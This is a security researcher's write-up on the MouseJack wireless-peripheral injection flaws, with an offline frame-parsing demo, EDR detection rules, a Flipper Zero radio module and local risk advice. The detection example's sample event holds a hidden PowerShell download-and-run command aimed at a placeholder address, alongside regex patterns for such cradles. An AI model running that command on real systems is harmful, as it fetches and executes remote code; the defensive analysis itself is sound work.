Why I Built It
The trigger was reading the original MouseJack disclosure by Bastille Networks. It made me realize that a class of peripherals most people assume to be harmless — the cheap wireless mouse on your desk — can be weaponized from a car park. I wanted a research platform small enough to carry in a jacket pocket, native to the Flipper Zero ecosystem, and capable of passive scanning, protocol analysis, and controlled lab tests. What I did not want was to rediscover a ten-year-old bug; I wanted to understand it deeply enough to help organizations here in the Maldives understand the exposure sitting on their own desks.
MouseJack — The Vulnerability Behind This Project
Origins & Discovery
In February 2016, Marc Newlin of Bastille Networks' Threat Research Team announced MouseJack — a family of nine distinct vulnerabilities catalogued under Bastille tracking numbers #1–7, #9, and #12. The team comprised RF and cybersecurity specialists including the top four finalists of the DARPA Spectrum Challenge, lending the research considerable credibility. The findings were registered with US-CERT / CERT-CC at Carnegie Mellon University, which issued a formal advisory.
The Technical Root Cause
Wireless mice and keyboards in the 2.4 GHz ISM band talk to a USB dongle plugged into the host computer. The protocols are proprietary, built on Nordic Semiconductor's nRF24 family of transceivers (the nRF24L01+ in peripherals, the nRF24LU1+ in many dongles), and were designed for convenience and battery life, not for adversarial environments. The receiver checks only that a frame carries the expected RF address and a valid CRC; neither is a secret (the address can be learned by sniffing) and the CRC is an integrity check, not authentication. Because the dongle cannot distinguish legitimate mouse packets from attacker-crafted ones, it accepts both and forwards them to the OS as genuine input. Crucially, while most of the affected keyboards encrypt their keystrokes, the dongles often also accept unencrypted keyboard packets, so an attacker never needs to break the encryption at all.
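To make the "address and CRC are all the receiver checks" point concrete, here is an added example (written for this article, not code from Bastille or from the module's firmware) that builds and parses nRF24L01+ Enhanced ShockBurst frames offline. The layout follows the nRF24L01+ datasheet: address, a 9-bit Packet Control Field, payload, and a CRC-16 over address, PCF and payload. The dongle address, the `MOUSE_MOVE` and `INJECTED` payload bytes, and the `dongle_accepts` model are all constructed for illustration; they are not any vendor's real packet format.

```python
"""nRF24L01+ Enhanced ShockBurst (ESB) frame builder/parser (offline, no radio).

Added example for this article. Frame layout per the nRF24L01+ datasheet:
address (3-5 bytes), 9-bit Packet Control Field, payload (0-32 bytes),
CRC-16 over address + PCF + payload. Sample addresses/payloads are constructed.
"""
from __future__ import annotations
from dataclasses import dataclass
from typing import List, Tuple

CRC_POLY = 0x1021   # x^16 + x^12 + x^5 + 1 (CRC-16/CCITT), nRF24 2-byte CRC
CRC_INIT = 0xFFFF


def bits_from_bytes(data: bytes) -> List[int]:
    """MSB-first bit list, matching nRF24 on-air bit order."""
    return [(b >> (7 - i)) & 1 for b in data for i in range(8)]


def bytes_from_bits(bits: List[int]) -> bytes:
    """Inverse of bits_from_bytes; len(bits) must be a multiple of 8."""
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


def crc16_bits(bits: List[int], init: int = CRC_INIT, poly: int = CRC_POLY) -> int:
    """Bit-serial CRC-16; bit-serial because the 9-bit PCF breaks byte alignment."""
    crc = init
    for bit in bits:
        feedback = ((crc >> 15) & 1) ^ bit
        crc = (crc << 1) & 0xFFFF
        if feedback:
            crc ^= poly
    return crc


@dataclass
class EsbFrame:
    address: bytes          # pipe address the dongle listens on (not a secret)
    payload: bytes          # 0-32 bytes of application data
    pid: int = 0            # 2-bit packet ID, used only for duplicate suppression
    no_ack: bool = False    # NO_ACK flag

    def pcf_bits(self) -> List[int]:
        if not 0 <= len(self.payload) <= 32:
            raise ValueError("ESB payload must be 0..32 bytes")
        pcf = (len(self.payload) << 3) | ((self.pid & 0b11) << 1) | int(self.no_ack)
        return [(pcf >> (8 - i)) & 1 for i in range(9)]

    def crc(self) -> int:
        return crc16_bits(bits_from_bytes(self.address) + self.pcf_bits()
                          + bits_from_bytes(self.payload))

    def to_air_bits(self) -> List[int]:
        """Everything after the preamble, in the order it is modulated."""
        crc = self.crc()
        return (bits_from_bytes(self.address) + self.pcf_bits() + bits_from_bytes(self.payload)
                + [(crc >> (15 - i)) & 1 for i in range(16)])


def parse_air_bits(bits: List[int], addr_len: int = 5) -> Tuple[EsbFrame, bool]:
    """Decode a captured frame and report whether its CRC checks out."""
    pos = addr_len * 8
    address = bytes_from_bits(bits[:pos])
    pcf = int("".join(map(str, bits[pos:pos + 9])), 2)
    pos += 9
    length, pid, no_ack = pcf >> 3, (pcf >> 1) & 0b11, bool(pcf & 1)
    payload = bytes_from_bits(bits[pos:pos + length * 8])
    pos += length * 8
    crc_bits = bits[pos:pos + 16]
    if len(crc_bits) != 16:
        raise ValueError("truncated frame")
    frame = EsbFrame(address, payload, pid, no_ack)
    return frame, frame.crc() == int("".join(map(str, crc_bits)), 2)


# Constructed sample data: an address as it would be learned by passive sniffing,
# and two placeholder payloads. Neither is a real vendor mouse/keyboard format.
DONGLE_ADDR = bytes.fromhex("A1B2C3D4E5")
MOUSE_MOVE = bytes([0x00, 0x01, 0x00, 0xFF])
INJECTED = bytes([0x00, 0x02, 0x4B, 0x45, 0x59])


def dongle_accepts(bits: List[int]) -> bool:
    """Model of what an nRF24 receiver checks: address match and CRC. Nothing else."""
    frame, crc_ok = parse_air_bits(bits, addr_len=len(DONGLE_ADDR))
    return crc_ok and frame.address == DONGLE_ADDR
```

Run `dongle_accepts` on `EsbFrame(DONGLE_ADDR, MOUSE_MOVE).to_air_bits()` and on `EsbFrame(DONGLE_ADDR, INJECTED).to_air_bits()`: both pass, because nothing in the frame proves who sent it. Only a corrupted bit or a different address is rejected, which is exactly the gap the attack vectors below exploit.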
The Five Attack Vectors
| Attack Vector | Mechanism | Impact |
|---|---|---|
| Mouse Spoofing | Dongle does not verify packet type matches the transmitting device. Attacker pretends to be a mouse but sends keypress packets instead of movement data. | Inject arbitrary keystrokes as if the user typed them. |
| Keyboard Spoofing | Many dongles do not enforce encryption even when the keyboard uses it. Attacker transmits raw unencrypted keyboard packets directly. | Full keystroke injection — open CMD, download malware, exfiltrate data. |
| Forced Pairing | Some dongles allow new peripherals to pair without user interaction. Attacker introduces a rogue keyboard which the dongle accepts. | Permanent foothold — attacker's device becomes a trusted peripheral. |
| Denial of Service | The 2.4 GHz channel is flooded with radio traffic (Bastille tracking #8). | Peripheral becomes unresponsive; disruption without code execution. |
| KeySniffer (related) | A separate Bastille disclosure (July 2016): keyboards that transmit keystrokes in the clear allow passive eavesdropping from up to 75 m away. | Credential theft, password capture, intellectual-property loss, silently and invisibly. |
Range, Cost & Stealth
| Attack Range | Up to 100 metres (line of sight), proven effective through walls and windows. |
|---|---|
| Hardware Cost | As little as $15 for a USB radio dongle; the Crazyradio PA used in Bastille's research is widely available. |
| AV Evasion | The injection arrives as ordinary keyboard input. Antivirus, IDS and firewalls see nothing until the typed commands do something observable. |
| OS Coverage | Windows, macOS, and Linux — all equally vulnerable via the dongle firmware. |
| Real-time Detection | No practical mechanism for end-users to detect an active attack. |
Confirmed Affected Brands
Bastille's team tested devices from seven major manufacturers and explicitly noted they could not test every model. Unbranded generic devices were outside the test pool; they commonly use the same nRF24-family chipsets.
| Brand | Finding & Response |
|---|---|
| Logitech | Unifying receiver confirmed vulnerable. Firmware patch issued, but many shipped devices remain unpatched. The popular M185 continued to show vulnerability post-patch. |
| Microsoft | Multiple wireless desktop sets affected. Windows Update advisory 3152550 partially mitigated mouse spoofing but did not fix keyboards; the Sculpt Ergonomic Mouse remained injectable. |
| Dell | KM714 confirmed vulnerable. Dell directed customers to Logitech's patch as the underlying dongle shares the same lineage. |
| HP & Lenovo | Both confirmed affected. Lenovo issued an update for the 500 series but noted it could only be applied at manufacture — existing field devices cannot be patched. |
| Amazon / Gigabyte | Confirmed affected. Neither vendor offered a firmware fix; replacement is the only option. |
| Unbranded & Generic | Not tested by Bastille. However, these products overwhelmingly use identical nRF24-family chipsets and almost certainly carry the same or worse vulnerabilities with zero prospect of a patch. |
Why the Vulnerability Persists in 2025
Despite being disclosed nearly a decade ago, MouseJack remains exploitable at scale. Many dongles expose no firmware update path at all, so the flaw is effectively permanent and the only fix is replacing the receiver. Even where patches exist, peripheral firmware updates are virtually never applied by end users. And the global supply chain continues to ship affected chipsets in new hardware, meaning brand-new devices purchased today may carry the exact same flaw from 2016.
The Maldives Market — A Local Blind Spot
The Maldives has a small but fast-growing IT retail sector, with dozens of local suppliers and resellers operating in Malé and across the atolls. The overwhelming majority of wireless peripherals available on the local market are budget, unbranded, or generic-OEM products sourced from Chinese manufacturers — products that were never in Bastille's original testing pool and almost certainly carry nRF24-family chipsets with no encryption and no authentication on the dongle link.
I have personally tested several models available from local IT suppliers here in the Maldives. The findings are consistent with what Bastille documented in 2016: unencrypted mouse packets, no dongle-side authentication, and in some cases zero pairing enforcement — meaning any nearby attacker can inject keystrokes without ever having been paired to the device.
| Observation | Detail |
|---|---|
| Product Type | Budget 2.4 GHz wireless mice and keyboards sold openly by local IT retailers in Malé and across the atolls. |
| Chipset | nRF24L-family transceivers or near-identical clones — the same silicon at the center of Bastille's 2016 findings. |
| Encryption | None observed on mouse packets in personally tested samples. Fully consistent with the MouseJack vulnerability profile. |
| Pairing Auth | Absent or trivially bypassable on all tested devices. The dongle accepted injected packets without any prior pairing. |
| Firmware Updates | No update mechanism exists on any tested device. These products are permanently and irreversibly vulnerable. |
| At-Risk Environments | Government offices, bank branches, resort back-offices, and SMEs across the Maldives actively use these peripherals. |
| User Awareness | Near zero. MouseJack is unknown to virtually all end users and most local IT administrators. |
Can EDR, XDR, or MDR Stop a MouseJack Attack?
This is one of the most important — and most misunderstood — questions in the context of this vulnerability. The short answer is: not at the point of entry, but potentially at the point of consequence. Understanding exactly where each layer of defense sits, and where it is blind, is critical for any organization assessing their real exposure.
Why the Initial Attack Bypasses All Three
MouseJack operates at the radio layer and is laundered through the USB HID layer. The dongle receives injected packets over the air and hands the operating system HID reports that are indistinguishable from those a real keyboard produces; the kernel HID stack, the input subsystem, and every EDR, XDR and MDR sensor above them see a keystroke from an already-enumerated, already-trusted device. No new USB device appears, no file is written and no network connection is opened until the typed commands themselves do so. Keystroke injection therefore cannot be detected at entry: the keyboard is the trusted device, and security agents inherit exactly the same blind spot.
Attack Phase Visibility Map
| Attack Phase | What Happens | EDR / XDR / MDR Visibility |
|---|---|---|
| RF Injection (Entry Point) | Attacker transmits crafted radio packets to the USB dongle from up to 100 m away. No process, file, or network connection is created. | None. This occurs at the RF hardware layer, entirely below any software sensor. |
| HID Trust (OS Acceptance) | Dongle passes injected keystrokes to the OS as legitimate HID input. The OS treats them identically to keystrokes from a real keyboard. | None. The OS itself cannot distinguish injected from genuine input at this stage. |
| Command Execution (Post-Entry) | Injected keystrokes open a terminal, run PowerShell, download a payload — just as a human would type. | Partial. EDR/XDR/MDR may flag unusual PowerShell invocations, unexpected child processes, or anomalous command-line arguments. |
| Payload Execution & Persistence | Downloaded malware runs, establishes persistence, or moves laterally via harvested credentials. | Yes — this is where EDR/XDR/MDR operates effectively. Malware behavior, lateral movement, C2 beaconing, and registry changes are all detectable. |
What EDR Can Detect — Downstream Consequences
Although EDR cannot see the radio injection itself, a well-tuned agent monitoring process behavior will often catch the consequences:
| Detection Opportunity | How EDR Catches It |
|---|---|
| Abnormal PowerShell Execution | Injected payloads frequently invoke PowerShell with encoded commands, execution policy bypasses, or IEX download-and-run patterns — all flagged by EDR behavioral analytics. |
| Unusual Process Chains | Injected keystrokes usually open the Run dialog or a shell, so the chain looks like a user launching PowerShell from explorer.exe; the chain alone is not anomalous. What engines such as Microsoft Defender for Endpoint and CrowdStrike Falcon flag is that chain combined with a hostile command line or hidden-window flags, or a shell appearing on a host whose user never runs one. |
| Unexpected Network Connections | If the injected commands fetch a second-stage payload, the outbound connection to an unfamiliar host is logged by EDR and XDR network telemetry and can trigger automated endpoint isolation. |
| Superhuman Typing Speed | Injected keystrokes arrive at a fixed machine cadence, far faster than any human sustains. Agents that can see per-keystroke timing can flag this, but it is not a standard EDR capability; treat it as a bonus signal, not a control. |
| Registry & File System Changes | Persistence mechanisms — registry run keys, scheduled tasks, dropped executables — are standard EDR detection territory and are reliably caught. |
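The table above is what a detection engineer would turn into rules. As an added example (written for this article, not a rule from any EDR vendor), the block below scores constructed process-creation events shaped like Sysmon Event ID 1 records and flags a keystroke burst typed faster than a human can. The events, the 203.0.113.10 address, the rule weights and the cadence thresholds are all assumptions; the cadence function also assumes a telemetry source that exposes per-keystroke timing, which, as noted above, most agents do not provide.

```python
"""Post-entry detection rules for keystroke-injection tradecraft.

Added example for this article. Events are constructed in a Sysmon-like shape;
weights and thresholds are assumptions to be tuned against real telemetry.
"""
from __future__ import annotations
import re
import statistics
from itertools import accumulate
from typing import Dict, List, Sequence

# Interpreters a typed payload reaches in a few keystrokes (Win+R, then a command).
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# Parents that mean "launched the way a human types it": the Run dialog is explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}

# (name, weight, regex over the command line)
CMDLINE_RULES = [
    ("encoded_command", 3, re.compile(r"(?i)\s-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden_window", 2, re.compile(r"(?i)\s-w(indowstyle)?\s+hidden")),
    ("exec_bypass", 2, re.compile(r"(?i)\s-(ep|executionpolicy)\s+bypass")),
    ("no_profile", 1, re.compile(r"(?i)\s-nop(rofile)?\b")),
    ("download_cradle", 3, re.compile(
        r"(?i)(iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|iwr|curl|bitsadmin|certutil)")),
]
ALERT_THRESHOLD = 4  # assumption: one cradle plus one evasion flag is enough


def score_process_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event; returns the rule hits and a total."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    cmdline = event.get("command_line", "")
    hits: List[str] = []
    total = 0
    if image in SHELLS:
        if parent in INTERACTIVE_PARENTS:
            # Not suspicious alone: a real user launching PowerShell from the Run
            # dialog produces exactly this chain. It only raises the stakes of cmdline hits.
            hits.append("shell_from_interactive_parent")
            total += 1
        for name, weight, rx in CMDLINE_RULES:
            if rx.search(cmdline):
                hits.append(name)
                total += weight
    return {"image": image, "parent": parent, "hits": hits,
            "score": total, "alert": total >= ALERT_THRESHOLD}


def typing_cadence_anomaly(key_times_ms: Sequence[float], min_keys: int = 20,
                           max_median_gap_ms: float = 30.0) -> bool:
    """Flag a burst typed faster than a human plausibly sustains.

    Injected keystrokes arrive at a fixed machine cadence of a few ms; human typing
    rarely holds a median inter-key gap under ~100 ms across 20+ keys. The median
    (not the minimum) keeps a single auto-repeat run from tripping it. Thresholds are
    assumptions.
    """
    if len(key_times_ms) < min_keys:
        return False
    gaps = [b - a for a, b in zip(key_times_ms, key_times_ms[1:])]
    return statistics.median(gaps) < max_median_gap_ms


# Constructed events (Sysmon Event ID 1 shape), not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object '
                     'Net.WebClient).DownloadString(\'http://203.0.113.10/a\')"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "command_line": r"C:\Windows\System32\cmd.exe /c npm run build"},
]

# Constructed keystroke timestamps: an 8 ms machine cadence versus a human rhythm.
INJECTED_KEY_TIMES_MS = [i * 8.0 for i in range(40)]
HUMAN_GAPS_MS = [130, 95, 210, 160, 110, 140, 180, 120, 260, 100] * 2
HUMAN_KEY_TIMES_MS = list(accumulate([0] + HUMAN_GAPS_MS))


def alerts_for(events: Sequence[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return only the scored events that cross the alert threshold."""
    return [r for r in (score_process_event(e) for e in events) if r["alert"]]


if __name__ == "__main__":
    for r in alerts_for(SAMPLE_EVENTS):
        print("ALERT", r["parent"], "->", r["image"], r["hits"], r["score"])
    print("injected cadence anomalous:", typing_cadence_anomaly(INJECTED_KEY_TIMES_MS))
    print("human cadence anomalous:", typing_cadence_anomaly(HUMAN_KEY_TIMES_MS))
```

Only the first event alerts: the explorer.exe to powershell.exe chain contributes a single point, and the download cradle plus the hidden-window and bypass flags carry it over the threshold. The bare `powershell.exe` launched from the Run dialog stays below it, which is the right outcome for a legitimate user.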
What XDR Adds
XDR extends EDR by correlating signals across endpoint, network, email, identity, and cloud into a unified incident view. For a MouseJack attack progressing to lateral movement, XDR stitches together the anomalous process, the outbound network beacon, the credential reuse on a second machine, and the unusual cloud login into one correlated incident. Platforms such as Palo Alto Cortex XDR, Microsoft Sentinel with Defender XDR, and Sophos XDR are designed for exactly this. However, they remain blind to the RF injection event itself — only its downstream trail is visible to them.
What MDR Adds
Managed Detection and Response puts human analysts behind the tooling around the clock. The key advantage is contextual threat hunting: an analyst who sees an anomalous PowerShell launched from explorer.exe can actively investigate, checking whether a 2.4 GHz receiver from the Bastille affected-device list is attached to the host (the injected keystrokes arrive through the existing dongle, so no new USB device appears), whether the process timing coincides with a window when an attacker could have been within radio range, and whether similar patterns appear on nearby machines. This goes beyond automated detection and can surface a MouseJack compromise that a pure EDR deployment might log but not escalate.
Verdict: Where Each Tool Stands
| Layer | Tool | Assessment |
|---|---|---|
| RF Injection | AV / EDR / XDR / MDR | No detection. The attack occurs below all software-based security layers. The only defense is hardware: remove the vulnerable peripheral. |
| HID Input Trust | OS / EDR | No detection at entry. Some advanced agents can flag inhuman HID input rates, but this is not a standard or reliable control. |
| Command Execution | EDR | Partial — detects suspicious PowerShell, abnormal process chains, and unexpected network calls. Does not prevent entry but can interrupt an attack in progress. |
| Lateral Movement & Persistence | EDR / XDR / MDR | Good coverage. Malware behavior, credential abuse, and C2 activity are reliably detected and can trigger automated containment. |
| Incident Correlation | XDR / MDR | Strong. XDR correlates cross-source signals into coherent incidents. MDR adds human analysis and proactive hunting. |
The Module — Design & Engineering
This is a Flipper Zero-compatible board centered on the nRF24L01+ transceiver, featuring an SMA antenna connector, RF matching components, and the power decoupling necessary for stable radio operation. It plugs directly into the Flipper's GPIO expansion header and is driven over SPI by community firmware that adds nRF24 support, enabling RF scanning and protocol analysis across the 2.4 GHz band.
| Spec | Detail |
|---|---|
| Transceiver | nRF24L01+ |
| Antenna | External SMA connector |
| Frequency Band | 2.4 GHz ISM |
| Host Interface | SPI via Flipper Zero GPIO expansion header |
| Power Regulation | On-board LDO with transient suppression for stable TX bursts |
| PCB | Custom 2-layer, Flipper-compatible form factor |
Engineering Challenges
RF Front End & Antenna Tuning — The 2.4 GHz band is acutely sensitive to PCB layout and component matching. Small changes to L/C values and trace geometry produced measurable differences in sensitivity and output power; iterative tuning with a spectrum analyzer was essential.
Component Sourcing — Acquiring small quantities of SMD components proved a genuine bottleneck. Minimum order quantities and long lead times from distributors added weeks to the timeline.
Debugging Without Instruments — The oscilloscope failed mid-development and had to be repaired before work could meaningfully continue. Once restored, it dramatically reduced guesswork and accelerated the debugging cycle.
PCB Constraints — The tight board area demanded careful RF trace routing, thorough ground stitching, and targeted bypass capacitor placement to maintain radio stability under real-world operating conditions.
Power Integrity — An on-board LDO and robust transient suppression were added to ensure the device remains stable during transmit bursts, where instantaneous current demand spikes sharply.
Responsible Disclosure & Ethics
This project is research-first. No step-by-step exploit instructions are published. The goal is awareness — particularly in a local market where these risks are almost entirely unknown.
- Test only on devices you own or with explicit, informed consent.
- Privately report critical findings to vendors and allow reasonable time for remediation.
- Publish high-level trends and mitigations to improve awareness and encourage vendor fixes.
Recommendations — Especially for the Maldives
Government & Enterprises
Audit all wireless peripherals against the Bastille affected-device list. Replace unbranded 2.4 GHz dongles with Bluetooth or wired alternatives in any environment handling sensitive data.
Banks & Financial Institutions
The combination of high-value targets and cheap office peripherals is a serious risk. Procurement policy should explicitly prohibit unverified non-Bluetooth wireless input devices.
Local IT Suppliers
Consider stocking and actively promoting Bluetooth-based peripherals as a security-conscious alternative. Even a brief note at point of sale about this class of risk would make a real difference.
End Users
If you use a cheap 2.4 GHz wireless mouse or keyboard at work or at home, you are very likely vulnerable. Switching to wired peripherals removes this attack surface entirely; switching to Bluetooth removes the MouseJack-class exposure, though Bluetooth has its own, separate threat model.